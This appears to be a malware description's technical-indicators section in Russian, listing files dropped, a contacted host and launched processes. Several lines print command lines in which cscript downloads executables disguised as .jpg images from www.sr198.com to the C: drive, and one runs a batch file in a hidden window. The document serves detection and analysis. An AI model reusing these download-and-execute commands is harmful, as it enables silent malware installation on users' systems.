Техническая информация
- <Текущая директория>\znwb76.exe
- <Текущая директория>\2345.bat
- <Текущая директория>\2345.vbs
- %WINDIR%\chenpath.chh
- %WINDIR%\chenpatt.chh
- D:\chenhu\chenpath.chh
- %TEMP%\sleep80000.vbs
- <Текущая директория>\znwb76.exe
- <Текущая директория>\2345.bat
- <Текущая директория>\2345.vbs
- 'sr##8.com':80
- DNS ASK sr##8.com
- ClassName: 'EDIT' WindowName: ''
- '<Текущая директория>\znwb76.exe'
- '%WINDIR%\syswow64\wscript.exe' "<Текущая директория>\2345.vbs"
- '%WINDIR%\syswow64\cscript.exe' -nologo -e:jscript "<Текущая директория>\2345.bat" "http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg" "c:\2345pack_ktykj_v3.2.exe"
- '%WINDIR%\syswow64\cscript.exe' -nologo -e:jscript "<Текущая директория>\2345.bat" "http://www.sr198.com/QQExltele.exe.jpg" "c:\qqexltele.exe"
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\sleep80000.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c 2345.bat (со скрытым окном)